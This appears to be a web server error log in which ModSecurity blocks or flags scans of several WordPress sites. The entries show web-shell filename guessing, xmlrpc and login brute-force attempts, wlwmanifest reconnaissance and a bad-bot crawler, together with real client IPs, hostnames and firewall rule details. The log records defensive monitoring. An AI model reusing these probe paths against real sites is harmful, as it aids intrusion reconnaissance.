[Tue May 26 16:52:28.482868 2026] [security2:error] [pid 823496:tid 823711] [client 20.63.34.22:12163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/b.php"] [unique_id "ahWCdJa08mrtyBNpA4PoagAAAFM"]
[Tue May 26 16:52:28.482994 2026] [security2:error] [pid 823496:tid 823711] [client 20.63.34.22:12163] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/b.php"] [unique_id "ahWCdJa08mrtyBNpA4PoagAAAFM"]
[Tue May 26 16:52:28.671446 2026] [security2:error] [pid 823496:tid 823716] [client 117.198.37.168:57685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCdJa08mrtyBNpA4PoaQAAAFg"]
[Tue May 26 16:52:28.671570 2026] [security2:error] [pid 823496:tid 823716] [client 117.198.37.168:57685] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCdJa08mrtyBNpA4PoaQAAAFg"]
[Tue May 26 16:52:28.849330 2026] [security2:error] [pid 823496:tid 823664] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCc5a08mrtyBNpA4PoWAAAACQ"]
[Tue May 26 16:52:30.227328 2026] [security2:error] [pid 823496:tid 823715] [client 62.60.130.233:63605] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-login.php"] [unique_id "ahWCdpa08mrtyBNpA4PohQAAAFc"], referer: https://wordpress.org/
[Tue May 26 16:52:30.554131 2026] [security2:error] [pid 823496:tid 823748] [client 62.60.130.233:61381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-login.php"] [unique_id "ahWCdpa08mrtyBNpA4PoigAAAHg"], referer: https://wordpress.org/
[Tue May 26 16:52:31.321113 2026] [security2:error] [pid 817651:tid 817865] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCdtlGRCPPN1dS2y3ETgAAANk"]
[Tue May 26 16:52:31.575047 2026] [security2:error] [pid 823496:tid 823640] [client 20.63.34.22:12240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-sing.php"] [unique_id "ahWCd5a08mrtyBNpA4PopQAAAAw"]
[Tue May 26 16:52:31.575200 2026] [security2:error] [pid 823496:tid 823640] [client 20.63.34.22:12240] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-sing.php"] [unique_id "ahWCd5a08mrtyBNpA4PopQAAAAw"]
[Tue May 26 16:52:32.653385 2026] [security2:error] [pid 823496:tid 823635] [client 20.63.34.22:12244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-links-opml.php"] [unique_id "ahWCeJa08mrtyBNpA4PosgAAAAc"]
[Tue May 26 16:52:32.653500 2026] [security2:error] [pid 823496:tid 823635] [client 20.63.34.22:12244] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-links-opml.php"] [unique_id "ahWCeJa08mrtyBNpA4PosgAAAAc"]
[Tue May 26 16:52:32.854940 2026] [security2:error] [pid 823496:tid 823656] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCd5a08mrtyBNpA4PonAAAABw"]
[Tue May 26 16:52:32.885953 2026] [security2:error] [pid 823496:tid 823688] [client 176.99.12.164:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWCeJa08mrtyBNpA4PouQAAADw"]
[Tue May 26 16:52:32.886819 2026] [security2:error] [pid 823496:tid 823660] [client 176.99.12.164:56772] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahWCeJa08mrtyBNpA4PotwAAIBM"]
[Tue May 26 16:52:34.266660 2026] [security2:error] [pid 817651:tid 817823] [client 176.99.12.164:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/wp-content/cache/speedycache/www.cagmedya.com/all/index.html"] [unique_id "ahWCetlGRCPPN1dS2y3EaQAAAK8"]
[Tue May 26 16:52:34.337174 2026] [security2:error] [pid 817651:tid 817896] [client 20.63.34.22:12229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/edit.php"] [unique_id "ahWCetlGRCPPN1dS2y3EbQAAAPg"]
[Tue May 26 16:52:34.337276 2026] [security2:error] [pid 817651:tid 817896] [client 20.63.34.22:12229] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/edit.php"] [unique_id "ahWCetlGRCPPN1dS2y3EbQAAAPg"]
[Tue May 26 16:52:34.711640 2026] [security2:error] [pid 823496:tid 823685] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCeZa08mrtyBNpA4PovQAAADk"]
[Tue May 26 16:52:34.713346 2026] [security2:error] [pid 817651:tid 817871] [client 176.99.12.164:56774] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWCetlGRCPPN1dS2y3EZwAA3ws"]
[Tue May 26 16:52:35.460430 2026] [security2:error] [pid 817651:tid 817903] [client 20.63.34.22:12278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wmore1.php"] [unique_id "ahWCe9lGRCPPN1dS2y3EdgAAAP8"]
[Tue May 26 16:52:35.460540 2026] [security2:error] [pid 817651:tid 817903] [client 20.63.34.22:12278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wmore1.php"] [unique_id "ahWCe9lGRCPPN1dS2y3EdgAAAP8"]
[Tue May 26 16:52:36.218152 2026] [security2:error] [pid 823496:tid 823745] [client 20.63.34.22:12280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-access.php"] [unique_id "ahWCfJa08mrtyBNpA4Po5AAAAHU"]
[Tue May 26 16:52:36.218263 2026] [security2:error] [pid 823496:tid 823745] [client 20.63.34.22:12280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-access.php"] [unique_id "ahWCfJa08mrtyBNpA4Po5AAAAHU"]
[Tue May 26 16:52:36.320823 2026] [security2:error] [pid 823496:tid 823649] [client 2.58.56.163:58932] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWCfJa08mrtyBNpA4Po5QAAABU"]
[Tue May 26 16:52:36.613163 2026] [security2:error] [pid 823496:tid 823723] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCe5a08mrtyBNpA4Po1gAAAF8"]
[Tue May 26 16:52:37.144585 2026] [security2:error] [pid 817651:tid 817868] [client 2.58.56.163:51823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/xmlrpc.php"] [unique_id "ahWCfNlGRCPPN1dS2y3EiAAAANw"]
[Tue May 26 16:52:37.785495 2026] [security2:error] [pid 817651:tid 817801] [client 2.58.56.163:49616] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWCfdlGRCPPN1dS2y3EkwAAAJk"]
[Tue May 26 16:52:37.857431 2026] [security2:error] [pid 823496:tid 823671] [client 20.63.34.22:12233] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/1.php"] [unique_id "ahWCfZa08mrtyBNpA4Po8AAAACs"]
[Tue May 26 16:52:37.857563 2026] [security2:error] [pid 823496:tid 823671] [client 20.63.34.22:12233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/1.php"] [unique_id "ahWCfZa08mrtyBNpA4Po8AAAACs"]
[Tue May 26 16:52:37.857678 2026] [security2:error] [pid 823496:tid 823671] [client 20.63.34.22:12233] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/1.php"] [unique_id "ahWCfZa08mrtyBNpA4Po8AAAACs"]
[Tue May 26 16:52:38.401703 2026] [security2:error] [pid 817651:tid 817813] [client 2.58.56.163:59282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWCftlGRCPPN1dS2y3EoQAAAKU"]
[Tue May 26 16:52:38.442867 2026] [autoindex:error] [pid 817651:tid 817896] [client 74.7.241.42:0] AH01276: Cannot serve directory /home2/karda17f/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.kardashevtechnologies.com/wp-content/uploads
[Tue May 26 16:52:38.664243 2026] [autoindex:error] [pid 823496:tid 823655] [client 74.7.241.42:0] AH01276: Cannot serve directory /home2/karda17f/public_html/wp-content/plugins/elementor/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.kardashevtechnologies.com/project/
[Tue May 26 16:52:38.937620 2026] [security2:error] [pid 823496:tid 823680] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCfZa08mrtyBNpA4Po7wAAADQ"]
[Tue May 26 16:52:39.005346 2026] [security2:error] [pid 823496:tid 823638] [client 2.58.56.163:59977] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWCf5a08mrtyBNpA4Po-gAAAAo"]
[Tue May 26 16:52:39.100907 2026] [security2:error] [pid 817651:tid 817897] [client 20.63.34.22:12180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/sbhu.php"] [unique_id "ahWCf9lGRCPPN1dS2y3ErwAAAPk"]
[Tue May 26 16:52:39.101013 2026] [security2:error] [pid 817651:tid 817897] [client 20.63.34.22:12180] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/sbhu.php"] [unique_id "ahWCf9lGRCPPN1dS2y3ErwAAAPk"]
[Tue May 26 16:52:39.316259 2026] [security2:error] [pid 817651:tid 817716] [remote 74.7.241.42:57764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kardashevtechnologies.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWCf9lGRCPPN1dS2y3EtAAAtUA"], referer: https://www.kardashevtechnologies.com/project/
[Tue May 26 16:52:39.614734 2026] [security2:error] [pid 823496:tid 823729] [client 2.58.56.163:61561] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWCf5a08mrtyBNpA4PpAwAAAGU"]
[Tue May 26 16:52:39.958684 2026] [security2:error] [pid 817651:tid 817869] [client 117.198.37.168:58005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCf9lGRCPPN1dS2y3EvQAAAN0"]
[Tue May 26 16:52:39.958805 2026] [security2:error] [pid 817651:tid 817869] [client 117.198.37.168:58005] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCf9lGRCPPN1dS2y3EvQAAAN0"]
[Tue May 26 16:52:40.212570 2026] [security2:error] [pid 817651:tid 817784] [client 2.58.56.163:53141] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWCgNlGRCPPN1dS2y3EwwAAAIg"]
[Tue May 26 16:52:40.834816 2026] [security2:error] [pid 817651:tid 817875] [client 2.58.56.163:56386] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWCgNlGRCPPN1dS2y3EywAAAOM"]
[Tue May 26 16:52:40.920869 2026] [security2:error] [pid 823496:tid 823687] [client 45.154.98.38:53021] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWCgJa08mrtyBNpA4PpGQAAADs"]
[Tue May 26 16:52:41.017927 2026] [security2:error] [pid 823496:tid 823744] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCf5a08mrtyBNpA4PpBQAAAHQ"]
[Tue May 26 16:52:41.253585 2026] [security2:error] [pid 823496:tid 823632] [client 20.63.34.22:12277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/bgymj.php"] [unique_id "ahWCgZa08mrtyBNpA4PpHgAAAAQ"]
[Tue May 26 16:52:41.253768 2026] [security2:error] [pid 823496:tid 823632] [client 20.63.34.22:12277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/bgymj.php"] [unique_id "ahWCgZa08mrtyBNpA4PpHgAAAAQ"]
[Tue May 26 16:52:41.437659 2026] [security2:error] [pid 823496:tid 823668] [client 2.58.56.163:65328] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWCgZa08mrtyBNpA4PpIgAAACg"]
[Tue May 26 16:52:41.919075 2026] [security2:error] [pid 817651:tid 817868] [client 14.168.213.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCgNlGRCPPN1dS2y3ExgAAANw"]
[Tue May 26 16:52:41.960178 2026] [security2:error] [pid 823496:tid 823638] [client 20.63.34.22:12221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/file30.php"] [unique_id "ahWCgZa08mrtyBNpA4PpKwAAAAo"]
[Tue May 26 16:52:41.960266 2026] [security2:error] [pid 823496:tid 823638] [client 20.63.34.22:12221] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/file30.php"] [unique_id "ahWCgZa08mrtyBNpA4PpKwAAAAo"]
[Tue May 26 16:52:42.043564 2026] [security2:error] [pid 817651:tid 817832] [client 2.58.56.163:59495] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWCgtlGRCPPN1dS2y3E1QAAALg"]
[Tue May 26 16:52:42.244736 2026] [autoindex:error] [pid 823496:tid 823721] [client 74.7.241.42:0] AH01276: Cannot serve directory /home2/karda17f/public_html/wp-content/plugins/elementor-pro/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.kardashevtechnologies.com/project/
[Tue May 26 16:52:42.418140 2026] [security2:error] [pid 823496:tid 823650] [client 20.63.34.22:12168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/yellow.php"] [unique_id "ahWCgpa08mrtyBNpA4PpMgAAABY"]
[Tue May 26 16:52:42.418255 2026] [security2:error] [pid 823496:tid 823650] [client 20.63.34.22:12168] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/yellow.php"] [unique_id "ahWCgpa08mrtyBNpA4PpMgAAABY"]
[Tue May 26 16:52:42.665271 2026] [security2:error] [pid 823496:tid 823635] [client 2.58.56.163:53022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWCgpa08mrtyBNpA4PpNwAAAAc"]
[Tue May 26 16:52:42.707537 2026] [security2:error] [pid 823496:tid 823735] [client 34.141.215.197:8192] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "root.redirefr.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWCgpa08mrtyBNpA4PpOAAAAGs"]
[Tue May 26 16:52:42.707621 2026] [security2:error] [pid 823496:tid 823735] [client 34.141.215.197:8192] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "root.redirefr.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWCgpa08mrtyBNpA4PpOAAAAGs"]
[Tue May 26 16:52:42.887234 2026] [security2:error] [pid 823496:tid 823714] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCgZa08mrtyBNpA4PpJQAAAFY"]
[Tue May 26 16:52:43.246682 2026] [security2:error] [pid 823496:tid 823639] [client 2.58.56.163:61072] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWCg5a08mrtyBNpA4PpPwAAAAs"]
[Tue May 26 16:52:43.526854 2026] [security2:error] [pid 823496:tid 823655] [client 45.154.98.38:65183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWCg5a08mrtyBNpA4PpQAAAABs"]
[Tue May 26 16:52:43.696288 2026] [security2:error] [pid 823496:tid 823725] [client 20.63.34.22:12260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/reze.php"] [unique_id "ahWCg5a08mrtyBNpA4PpSAAAAGE"]
